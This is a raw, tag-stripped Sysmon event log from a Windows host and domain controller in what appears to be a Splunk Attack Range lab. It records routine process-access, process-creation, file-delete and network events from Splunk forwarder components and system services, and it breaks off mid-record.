10341000x8000000000000000807608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.850{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807604Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807603Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.835{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.835{0C1E0330-F4BA-60EB-7779-00000000D001}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.647{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4FD25D27289975EF4D7878E9A93FEBB,SHA256=10CF2EEE0A945C5978E166316B1CD40779EC25C514BA1AD33A827D284005AB9B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92708BF4F1E2A2F8720BF51F039B46F1,SHA256=5CEA1492B5CFEE687E8355BF687EE6466E2CCFA3DBB689A59E54D00A2E411D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:26.424{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FCDAA41136586C4A41ADFAB6D1DD382,SHA256=E316B2BFA146249E281CD53BD16C391AAF5719DBC5B4A3EB17D776FC4EB5545E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.178{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.178{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.178{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.178{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:26.163{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.163{0C1E0330-F4BA-60EB-7679-00000000D001}1504C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000807628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:26.233{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57267-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:27.835{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AFE28E4981ECCFAB1A26CE648ADCB45,SHA256=ACD6F36E843A374A44D3038393BA6A22101A7836A517DE8DDF20B37056082B52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 